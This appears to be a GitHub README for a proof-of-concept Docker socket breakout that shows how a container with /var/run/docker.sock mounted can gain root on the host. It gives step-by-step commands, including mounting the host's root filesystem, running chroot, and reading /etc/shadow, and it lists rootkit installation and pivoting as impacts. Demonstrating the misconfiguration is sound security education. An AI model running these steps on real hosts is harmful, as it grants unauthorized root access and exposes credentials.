π³ Docker.sock Breakout
π¨ A proof-of-concept showing how mounting /var/run/docker.sock into a container gives root access to the host. This project demonstrates a critical Docker misconfiguration. By mounting the Docker Unix socket into a container, the container can communicate with the host Docker daemon β and effectively escape its sandbox, escalate privileges, and fully control the host. β οΈ TL;DR Mounting /var/run/docker.sock gives the container root-level access to the host. π Project Structure docker-sock-breakout/ βββ Dockerfile βββ docker-compose.yml βββ exploit.sh π§ͺ How It Works A container is started with -v /var/run/docker.sock:/var/run/docker.sock Inside the container, Docker CLI is available We use Docker inside the container to run another container That second container mounts / from the host and runs chroot /host Now weβre inside the host, as root π Quick Start 1. Build and Run git clone https://github.com/CyberSquirrel-AI/docker-sock-breakout.git cd docker-sock-breakout docker compose up -d docker exec -it docker-sock-breakout sh 2. Inside the Container docker ps docker run -it --rm -v /:/host alpine 3. Inside the Alpine container chroot /host hostname id ls /root cat /etc/shadow π Impact Full host filesystem access Run arbitrary containers as --privileged Read sensitive files like /etc/shadow, /root/.ssh/ Install rootkits or persist on host Pivot to other containers, networks, volumes π‘οΈ Mitigation β Do NOT mount /var/run/docker.sock into untrusted containers β οΈ Disclaimer This project is for educational purposes only. Do not run this on any system you donβt own or have permission to test. You are responsible for your actions. ...